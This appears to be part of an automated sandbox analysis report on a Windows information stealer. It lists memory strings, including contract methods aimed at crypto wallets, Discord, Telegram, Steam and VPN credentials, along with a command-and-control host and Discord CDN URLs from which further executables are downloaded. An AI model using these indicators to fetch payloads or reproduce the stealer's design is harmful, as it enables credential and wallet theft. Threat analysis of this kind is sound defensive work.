                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, 123.exe, 00000007.00000002.926349748.00000000034A9000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crl0a
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sf.symcd.com0&
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnect
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/Confirm
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettings
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtendV
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsers
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWallets
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefenders
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscord
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnections
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwares
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsers
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwares
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguages
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPN
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPN
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcesses
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponseD
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFiles
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFilesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFilesResponseD
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFiles
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFilesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFiles
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFilesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdates
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdatesResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/Init
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplay
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplayResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/InitResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironment
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdate
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponse
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponse41347094/899321386839977984/124.exe%tmp%
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponseD
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponsesResponse
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: MVB56JJDeJ.exeString found in binary or memory: https://by.greentry.site
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: https://by.greentry.site/
                      Source: MVB56JJDeJ.exe, 00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmpString found in binary or memory: https://by.greentry.site1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897970496841347094/899319021416116294/123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897970496841347094/899321386839977984/124.exe%tmp%
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4Rl
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: 123.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.735531936.0000000003F52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: MVB56JJDeJ.exe, 00000000.00000002.735531936.0000000003F52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabx:
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.735531936.0000000003F52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733264935.0000000002EF0000.00000004.00000001.sdmp, 123.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
                      Source: 123.exe, 00000007.00000002.926446658.0000000004437000.00000004.00000001.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: by.greentry.site
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: by.greentry.siteConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/897970496841347094/899319021416116294/123.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 45.130.41.15:443 -> 192.168.2.4:49775 version: TLS 1.2
